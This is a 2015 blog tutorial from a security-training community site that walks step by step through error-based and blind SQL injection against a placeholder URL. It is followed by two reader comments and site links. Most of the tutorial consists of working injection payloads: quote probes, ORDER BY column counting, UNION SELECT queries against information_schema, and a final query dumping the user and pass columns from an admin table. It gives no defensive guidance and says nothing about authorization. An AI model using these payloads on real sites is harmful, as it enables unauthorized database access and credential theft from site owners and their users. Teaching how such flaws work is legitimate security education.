What You Should Know About SQL Injection

September 17, 2015 | Views: 7370

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

SQL Injection:

SQL injection is a code injection technique, used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Types :

[-]Error based

[-]Blind based

 

[1]Error based:

In error based we used error through-ed by database to preform injection.

 

Let me show an example:

Suppose we have a web app that has a database on the back end and it’s fetching data from it.

Like this website: www.website.com/index.php?id=84

?id=84 means it’s fetching something with the id 84 from a database and this is our way to communicate with the database.

 

So let’s go forward with these steps…

(1) Finding if it’s vulnerable.

Put a single quote  at the end: www.website.com/index.php?id=84′

If you receive an error like: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.” Or something like that, it means that the web app is vulnerable to SQL injection.

What’s so good about getting this error message? The good thing is that we’re able to get errors from the database.

 

(2) Joining queries.

Now, for joining queries put –+ at end like this: www.website.com/index.php?id=84′ –+

And, between this, we’ll execute our query.

 

(3) Find the number of columns.

For this, we use order by or group by clauses to find a number of columns. But, there are two possibilities: do we have to leave our single quote( ‘ ) in here or do we have to remove it?

How will I know?

Simple…keep the tip below in mind:

Tip:

If you run the order clause “correctly” – meaning with more columns in the database, you’ll see an error like this “unknown column ‘100’ in ‘order clause'”

With this, we now know we have to remove the ( ‘ )  or not

Run the order clause with a guess of the max number or columns like this: www.website.com/index.php?id=84′ order by 100000000 –+

Do we get an error like this?

“unknown column ‘100000000’ in ‘order clause'”

If no, then it means that we have to remove our  ( ‘ ) from the link – otherwise it should be here.

We’ll keep on guessing the numbers of columns randomly. Dude, how will I know that I’ve guessed the right number of columns??

Simple.

-if you exceed it, the database gives and error like “unknown column ‘100’ in ‘order clause'”

-if you are below it, you’ll see an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.'”

– if you’re on spot, then there’s no error

 

Suppose:

1-www.website.com/index.php?id=84’ order by 100 –+

Error: “unknown column ‘100 in ‘order clause'” 

2-www.website.com/index.php?id=84′ order by 8–+

Error : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”

This means that number of columns are below 100 and greater then 8

We try:
2-www.website.com/index.php?id=84’ order by 10 –+

No error?? Bingo. This is the number we wanted. We have 10 columns.

 

(4) Finding vulnerable column.

We have to find out by which column we can print information. For that, we use union select. We’ll do union select of 10 columns like this:
www.website.com/index.php?id=84′ union select 1,2,3,4,5,6,7,8,9,10 –+

The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable they’ll be printed on the web app. You can use any of them to print data; you can even use all of them.)

If you don’t get anything printed out – behind the ID number, some column name is hidden behind some content: www.website.com/index.php?id=-84′ union select 1,2,3,4,5,6,7,8,9,10 –+

Now that we’ve found vulnerable columns, we’ll use them to print info from database.

 

(5) Fetching data

Let’s use vulnerable column 3 to print the database name: www.website.com/index.php?id=84′ union select 1,2,database(),4,5,6,7,8,9,10 –+

You can use other functions, too – like user() to print user data and version() to print the version of database.

Let’s use vulnerable column 6 to print the table name’s in database: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()–+

Suppose we got three tables:
admin, users, pages

Let’s use vulnerable column 6 to print column names from the admin table. For this, we have to convert the table name to hex first, then put it after table_name=(hexed table name here): www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a–+

Suppose we got following columns:

user, pass

We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+

 

[2] Blind based:

There is no data printed on the web app by applying ( ‘ ) at the end of the URL. So, how can I know that it’s also vulnerable?

Easy.

If you apply ( ‘ ) at the end of the URL and some text, object, picture – if anything got missed, then it’s vulnerable to blind based injection.

 

(1) Finding if it’s vulnerable.

Put a single quote at the end: www.website.com/index.php?id=84′

Things got missed?  This means the web app is vulnerable to blind based SQL injection 🙂

 

(2) Joining queries.

For joining queries, put –+ at end like that

www.website.com/index.php?id=84′ –+

And between this, we’ll execute our query.

 

(3) Finding the number of columns.

For this, we use order by or group by clause to find the number of columns.

There are two possibilities: do we have to leave our single quote ( ‘ ) in here or should we remove it?

Tip : if  putting –+

www.website.com/index.php?id=84′ –+

Brings things back to normal, meaning it returns all content, then it means we need (‘) – otherwise remove it.

“unknown column ‘100’ in ‘order clause'”

We’ll know if we have to remove ( ‘ )  or not.

Run the order clause with guess of max number or columns. We’ll keep on guessing the numbers of columns randomly. How will I know that I guessed the right number of columns?

– if you exceed, the content is missing

– if you’re below, the content is missing

– if you’re on spot, then no content is missing 🙂
Let’s take a look…

1-www.website.com/index.php?id=84′ order by 100 –+

*Content is missing

it means number of columns are below

2-www.website.com/index.php?id=84′ order by 8–+

*Content is missing

It means that number of columns are below 100 and greater then 8

Try:
2-www.website.com/index.php?id=84′ order by 10 –+

N0 content is missing? This is the number we wanted. We have 10 columns.

 

(4) Finding vulnerable columns

We have to find out by which column we can print information.

As above, we use union select: www.website.com/index.php?id=84′ union select 1,2,3,4,5,6,7,8,9,10 –+

The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable, they will be printed on the web app. You can use any or all of them.)

 

(5) Fetching data

Let’s use vulnerable column 3 to print the database name:
www.website.com/index.php?id=84′ union select 1,2,database(),4,5,6,7,8,9,10 –+

Let’s usecolumn 6 to print table name’s in database: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()–+

If we got three tables:
admin, users, pages

Let’s use column 6 to print column name’s from the admin table admin. We have to convert the table name to hex first then put it after table_name=(hexed table name here).

www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a–+

Suppose, we got following columns:

user, pass

We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+

 

🙂

Cheers

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
13 Comments
  1. thanks have been strugglikng for a while with this and its helped me a lot ,would you use sql map tool or just try to do it without

  2. Entry for beginner level clear explanation 🙂

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 566 / December 14, 2019
How do I Get MTA Certified?
Views: 1138 / December 12, 2019
How much does your PAM software really cost?
Views: 1582 / December 10, 2019
How Do I Get into Android Development?
Views: 1965 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel